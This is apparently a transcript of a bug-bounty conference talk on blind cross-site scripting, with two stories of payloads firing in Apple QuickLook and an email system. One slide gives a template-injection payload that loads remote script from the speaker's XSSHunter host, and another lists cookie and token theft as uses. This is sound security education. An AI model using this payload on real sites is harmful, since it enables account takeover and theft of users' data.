Upgrade to Pro — share decks privately, control downloads, hide ads and more …

Getting Blindly Lucky

JR0ch17
November 01, 2020
Technology
0
59

Getting Blindly Lucky

JR0ch17

November 01, 2020
Tweet

More Decks by JR0ch17

See All by JR0ch17
EASM mistakes waiting to happen
jr0ch17
0
32
Traversing my way in the internal network
jr0ch17
0
130
Getting Started in Bug Bounty
jr0ch17
0
77
Qu'est-ce que le bug bounty?
jr0ch17
0
85
Finding 5 bugs in a single parameter
jr0ch17
0
57
Beyond the Borders of Scope
jr0ch17
0
41
Bad API, hAPI Hackers!
jr0ch17
0
1.5k

Other Decks in Technology

See All in Technology
Zennのパフォーマンスモニタリングでやっていること
ryosukeigarashi
0
150
100 名超が参加した日経グループ横断の競技型 AWS 学習イベント「Nikkei Group AWS GameDay」の紹介/mediajaws202411
nikkei_engineer_recruiting
1
170
アプリエンジニアのためのGraphQL入門.pdf
spycwolf
0
100
テストコード品質を高めるためにMutation Testingライブラリ・Strykerを実戦導入してみた話
ysknsid25
7
2.7k
Platform Engineering for Software Developers and Architects
syntasso
1
520
OS 標準のデザインシステムを超えて - より柔軟な Flutter テーマ管理 | FlutterKaigi 2024
ronnnnn
0
210
Lexical Analysis
shigashiyama
1
150
複雑なState管理からの脱却
sansantech
PRO
1
150
Flutterによる 効率的なAndroid・iOS・Webアプリケーション開発の事例
recruitengineers
PRO
0
120
【令和最新版】AWS Direct Connectと愉快なGWたちのおさらい
minorun365
PRO
5
760
Application Development WG Intro at AppDeveloperCon
salaboy
0
190
障害対応指揮の意思決定と情報共有における価値観 / Waroom Meetup #2
arthur1
5
480

Featured

See All Featured
Measuring & Analyzing Core Web Vitals
bluesmoon
4
130
Performance Is Good for Brains [We Love Speed 2024]
tammyeverts
6
430
RailsConf 2023
tenderlove
29
900
Become a Pro
speakerdeck
PRO
25
5k
Gamification - CAS2011
davidbonilla
80
5k
Reflections from 52 weeks, 52 projects
jeffersonlam
346
20k
Building a Modern Day 
E-commerce SEO Strategy
aleyda
38
6.9k
10 Git Anti Patterns You Should be Aware of
lemiorhan
655
59k
Mobile First: as difficult as doing things right
swwweet
222
8.9k
Building Flexible Design Systems
yeseniaperezcruz
327
38k
GraphQLの誤解/rethinking-graphql
sonatard
67
10k
The Cult of Friendly URLs
andyhume
78
6k

Transcript

  1. Getting Blindly Lucky Interesting Blind XSS Stories

  2. {{ whoami }} Jasmin Landry JR0ch17 Part time bug bounty

    hunter

  3. {{ agenda }} • What is XSS? • & •

    Blind XSS Stories • Questions/Comments

  4. {{ XSS }} Cross-Site Scripting (XSS) attacks are a type

    of injection, in which malicious scripts are injected into trusted websites.* • Malicious Script • Types of XSS • Reflected • DOM => postMessage() • Stored => Blind * https://owasp.org/www-community/attacks/xss/

  5. {{ XSS PoCs}} • Typical PoCs • Steal CSRF Tokens

    • Steal Cookies (if not HttpOnly) • Steal localStorage and sessionStorage tokens • Can also be used in CORS misconfigs with XHR or with the Fetch API to steal sensitive data (ie. PII) • SSRF if found in HTML to PDF converter

  6. {{ }} MVC client-side framework built by Google • XSS

    • Not the typical XSS • Template Injection • {{7*7}} => returns 49 https://jsfiddle.net/navb4jh3/

  7. {{ }} “Progressive” MVVM client-side framework for building UIs and

    SPAs • XSS • Not the typical XSS • Template Injection • {{7*7}} => returns 49 https://jsfiddle.net/s6b3dy25/

  8. {{ vs }} https://www.wappalyzer.com/compare/angular-vs-vue-js/

  9. {{ Blind XSS }} Variant of a Stored XSS. The

    payload is saved and executed in a separate part of the application (ie. Admin panel) or in a completely different application (internal application) • Tools • XSSHunter • Sleepy Puppy • Burp Collaborator

  10. {{ XSSHunter Payloads }}

  11. {{ HackerOne Hacktivity Blind XSS Reports }} All blind XSS

    payloads from HackerOne’s Hacktivity are from an HTML context (ie. <script> tag) Not a single one from template injection

  12. {{ & Blind XSS Payload }} {{ constructor.constructor('import("https://jr0ch17.xss.ht")') () }}

  13. {{ Blind XSS Stories }}

  14. {{ Blind XSS Story #1 }} A Google search lead

    to Apple’s QuickLook feature QuickLook is a way to preview a file to view its contents instead of having to open the file

  15. {{ Blind XSS Story #1 }} When an XSS triggers

    with XSSHunter, it captures the DOM...

  16. {{ Blind XSS Story #1 }}

  17. {{ Blind XSS Story #1 }} Turns out the CSV

    file contained a LOT of PII...

  18. {{ Blind XSS Story #2 }} Again, I look at

    the DOM.....

  19. {{ Blind XSS Story #2 }} Someone had filed a

    complaint on my user!!! The complaint was forwarded as an email The XSS triggered in the email system!

  20. {{ Thank You}} Questions or comments @JR0ch17 https://linkedin.com/in/jasminlandry